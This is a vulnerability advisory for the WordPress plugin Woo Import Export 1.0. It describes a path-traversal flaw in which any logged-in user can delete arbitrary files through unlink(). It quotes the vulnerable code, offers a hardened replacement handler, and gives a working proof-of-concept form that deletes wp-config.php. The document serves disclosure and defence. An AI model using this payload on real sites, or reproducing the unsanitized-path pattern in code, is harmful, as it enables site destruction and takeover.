Plugin Woo Import Export 1.0 Arbitrary File Deletion – Unlink

Details

  • Name : Woo Import Export
  • Version : 1.0
  • Homepage : https://wordpress.org/plugins/woo-import-export-lite/

Type

  • Arbitrary File Deletion
  • Remote Code Execution - RCE

Description

  • Required user access: any registered user.
  • $_POST['file_name'] is used unsanitized to build the path passed to unlink().

Code

File:  woo-import-export-lite/includes/classes/class-wpie-product.php Line: 3263
$file_name = isset( $_POST['file_name'] ) ? $_POST['file_name'] : ""; // taken verbatim from the request, no sanitization
...
if ( $log_id != "" ) {

   $wpdb->query( $wpdb->prepare( "DELETE FROM " . $wpdb->prefix . "wpie_export_log WHERE export_log_id = %d ",
      $log_id ) );

   // path built by plain concatenation: "../" sequences in $file_name escape WPIE_UPLOAD_DIR
   if ( file_exists( WPIE_UPLOAD_DIR . '/' . $file_name ) ) {
      @unlink( WPIE_UPLOAD_DIR . '/' . $file_name ); // "@" suppresses any error, so the deletion leaves no warning in the logs
   }

   $return_value['message'] = 'success';

   $return_value['message_content'] = __( 'Successfully Deleted.', WPIE_TEXTDOMAIN );
}
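A hardened replacement for the handler above, written as an added example for this advisory rather than code from the plugin or its vendor. The function names wpie_safe_export_path() and wpie_remove_export_entry_hardened(), the 'manage_woocommerce' capability and the nonce action name are assumptions; the fix is the combination of a capability check, a nonce check, an integer log id, and a file path that is resolved with realpath() and verified to stay inside WPIE_UPLOAD_DIR before unlink() is called:

```php
<?php
// Added example (not the plugin's own code). Function names, the capability and
// the nonce action are assumptions chosen for illustration.

/**
 * Resolve $file_name to a real path inside $base_dir.
 * Returns null when the name is empty, escapes the directory (traversal,
 * absolute path, symlink pointing outside) or does not exist.
 */
function wpie_safe_export_path( $base_dir, $file_name ) {
    // Keep only the last path component: drops "../", "/" and drive prefixes.
    $name = basename( (string) $file_name );
    if ( $name === '' || $name === '.' || $name === '..' ) {
        return null;
    }

    $base = realpath( $base_dir );
    if ( $base === false ) {
        return null;
    }
    $base = rtrim( $base, DIRECTORY_SEPARATOR );

    // realpath() follows symlinks, so a link inside the upload directory
    // that points at wp-config.php is rejected by the prefix check below.
    $target = realpath( $base . DIRECTORY_SEPARATOR . $name );
    if ( $target === false || strpos( $target, $base . DIRECTORY_SEPARATOR ) !== 0 ) {
        return null;
    }
    return $target;
}

/**
 * Hardened AJAX handler: authorization, CSRF check, typed id, contained path.
 */
function wpie_remove_export_entry_hardened() {
    global $wpdb;

    // Authorization: export management is a store-manager action, not one
    // every registered user may perform (capability name is an assumption).
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // CSRF protection; the nonce action name is an assumption.
    check_ajax_referer( 'wpie_remove_export_entry', 'security' );

    $log_id    = isset( $_POST['log_id'] ) ? absint( $_POST['log_id'] ) : 0;
    $file_name = isset( $_POST['file_name'] )
        ? sanitize_file_name( wp_unslash( $_POST['file_name'] ) )
        : '';

    if ( $log_id === 0 ) {
        wp_send_json_error( array( 'message' => 'invalid log id' ), 400 );
    }

    $wpdb->query( $wpdb->prepare(
        "DELETE FROM {$wpdb->prefix}wpie_export_log WHERE export_log_id = %d",
        $log_id
    ) );

    // Only delete a regular file that provably lives under the upload directory.
    $path = wpie_safe_export_path( WPIE_UPLOAD_DIR, $file_name );
    if ( $path !== null && is_file( $path ) ) {
        unlink( $path ); // no "@": a failure here should surface in the error log
    }

    wp_send_json_success( array(
        'message'         => 'success',
        'message_content' => __( 'Successfully Deleted.', WPIE_TEXTDOMAIN ),
    ) );
}
add_action( 'wp_ajax_wpie_remove_export_entry', 'wpie_remove_export_entry_hardened' );
```

With this handler the proof-of-concept value "../../../wp-config.php" collapses to "wp-config.php" inside WPIE_UPLOAD_DIR, which does not exist there, so nothing is unlinked; the request is already rejected earlier for a user without the capability or without a valid nonce. A further improvement, if the export log table stores the file name for each export_log_id, is to read the name from that row instead of trusting $_POST['file_name'] at all.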

Proof of Concept

1 - Log in with any user.
2 - Execute form:
<form method="post" action="http://src.wordpress-develop.dev/wp-admin/admin-ajax.php?action=wpie_remove_export_entry">
   <input type="text" name="file_name" value="../../../wp-config.php">
   <input type="text" name="log_id" value="aaa">
   <input type="submit">
</form>

Results

wp-config.php is deleted and the whole site is reset: without that file WordPress falls back to its fresh-installation setup screen.

Note


Solution


Timeline

  • Date Discovery : 11/25/2017
  • Date Vendor Contact : 12/29/2017
  • Date Publish :
  • Date Resolution :